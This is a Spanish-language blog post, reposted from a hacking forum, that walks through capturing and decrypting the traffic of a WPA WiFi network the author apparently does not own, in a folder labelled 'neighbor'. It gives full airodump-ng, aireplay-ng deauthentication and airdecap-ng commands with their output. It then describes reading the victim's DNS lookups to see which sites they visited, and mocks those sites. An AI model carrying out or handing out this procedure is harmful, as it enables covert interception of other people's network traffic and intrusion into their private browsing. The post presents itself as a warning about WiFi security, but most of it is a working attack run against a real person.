Capturando el tráfico de una red WiFi como un ninja

4:55 ANTRAX 0 Comments


Una de las cosas que más nos debería preocupar cuando tenemos a un intruso en nuestra red de confianza (Red local de casa, del trabajo, etc.) es que capture el tráfico y lo analice, de forma que pueda controlar lo que estamos haciendo.

Una vez invadida una red WiFi podríamos intentar capturar tráfico con tcpdump, pero no tendríamos los resultados esperados. Una buena forma de hacerlo sería redirigir todo el tráfico de la red a nuestro equipo para poder analizarlo, pero ésto podría disparar varias alarmas.

The quieter you become, the more you are able to hear
El lema de BackTrack es lo que nos trae a buscar procedimientos más silenciosos, así que... ¿Cómo podemos capturar el tráfico de la red sin llamar la atención?

La respuesta es, como siempre: DEPENDE

Muchos hackers dan una respuesta muy tajante con respecto a la seguridad y el WiFi: No lo uses, usa cable. Pero ¿por qué son tan tajantes?



Algunos se amparan en la lógica de la velocidad de red. Está muy bien que con las redes WiFi N alcances 150Mbps, o que los 450Mbps con wifi a 5GHz, pero sigue siendo menos que la mitad que las redes Gigabit. Coherente, lógico y correcto. En eso es mejor el cable que el WiFi. ¿Pero qué más?

Seguridad. Utilizar WiFi es jugar con fuego bajo determinadas circunstancias, ya que el tráfico de la red se puede capturar sin estar conectado a la red (Cualquiera que sepa levantar claves WEP habrá capturado muchísimo tráfico antes de conocer la contraseña)

Una vez sabida la contraseña podríamos intentar descifrar todo el tráfico capturado para su posterior análisis en Ethereal. Pero en las redes WPA no es tan sencillo. Es muy fácil, pero no tanto.

¿Cómo se crackea una clave WPA?

No lo voy a explicar aquí en detalle, éso debéis estudiarlo en otros posts. Necesitamos llegar aquí sabiendo que necesitamos capturar el handshake de un cliente autenticado para hacerle un ataque por diccionario, hasta que el archivo se descifra correctamente y obtenemos el positivo.

Por esa regla de tres podemos deducir que si tenemos el handshake y la contraseña podemos descifrar los paquetes capturados para analizarlos después. Y para eso no necesitamos estar conectados a la red, sólo tener nuestra antena WiFi a la escucha.

El otro día estuve jugando con ataques de fuerza bruta contra WPS con un resultado fructífero. Usaré ese AP a modo de dummy. (Nota: Los posibles datos identificativos han sido editados)

Código: Text
  1. root@kali:/home/rand0m/neighbor# airodump-ng -w ahorateveo --bssid D8:61:FF:FF:FF:FF --essid VodafoneFFFF --channel  7 --output-format pcap -a wlan0mon

Lanzamos airodump-ng con los parámetros bssid y essid para filtrar sólo el tráfico de la red que nos interesa. Además le decimos que nos guarde el archivo ahorateveo en formato pcap.

Código: Text
  1.  CH  7 ][ Elapsed: 0 s ][ 2015-08-18 22:07
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

De primeras tenemos nuestra antena a la escucha y filtrando los paquetes de la red que queremos. Ahora necesitamos el handshake, así que lanzamos el ataque DEAUTH con aireplay-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# aireplay-ng -0 0 -a D8:61:FF:FF:FF:FF wlan0mon
  2. 22:10:30  Waiting for beacon frame (BSSID: D8:61:FF:FF:FF:FF) on channel 7
  3. NB: this attack is more effective when targeting
  4. a connected wireless client (-c <client's mac>).
  5. 22:10:31  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  6. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  7. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  8. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  9. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  10. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  11. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  12. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  13. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  14. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]

Hasta que conseguimos lo que queríamos: El WPA handshake.

Código: Text
  1.  CH  7 ][ Elapsed: 5 mins ][ 2015-08-18 22:12 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -74    1e- 6      0     4019  VodafoneFFFF

Ahora lo dejamos a la escucha y nos olvidamos. Vamos a dejarlo capturando unas horas y luego veremos qué nos encontramos.

Cuando tenemos un buen pino ya podemos ponernos a estudiar los datos recopilados.

Código: Text
  1.  CH  7 ] 9 hours 55 mins ][ 2015-08-19 08:02 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -82  96   298434    99355    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -75    1e- 6      0     1365  VodafoneFFFF

Ahora, para descifrarlo, usaremos la herramienta airdecap-ng, que viene con la suite de aircrack-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# airdecap-ng -e VodafoneFFFF -b D8:61:FF:FF:FF:FF -p Underc0de ahorateveo-01.cap
  2. Total number of packets read       2532614
  3. Total number of WEP data packets         0
  4. Total number of WPA data packets     93405
  5. Number of plaintext data packets         0
  6. Number of decrypted WEP  packets         0
  7. Number of corrupted WEP  packets         0
  8. Number of decrypted WPA  packets     79414

Esto nos generará el archivo ahorateveo-01-dec.cap con los paquetes descifrados. Ya sólo nos queda abrirlo en Wireshark para poder analizar los datos recopilados.

Por ejemplo, viendo las consultas DNS realizadas podemos ver por dónde estuvo navegando.


Y podemos ver que es un chico malo malo que navega por piratebay y por páginas golfas. Lo típico que hace alguien relajándose mientras no hay nadie mirando, pero ¿cuántas veces creemos que no nos observan mientras sí lo hacen?

Además, como hablábamos al principio, los paquetes se capturaron del aire. No estoy conectado a la red, sólo conozco la contraseña.

NO aparezco conectado a su red. NO aparezco enviando tráfico sospechoso. Sólo escucho, descifro y analizo.

Autor: rand0m
Fuente: https://underc0de.org/foro/wireless/capturando-el-trafico-de-una-red-wifi-como-un-ninja

ANTRAX

0 comentarios:

Suscribirse a: Enviar comentarios (Atom)

Posts populares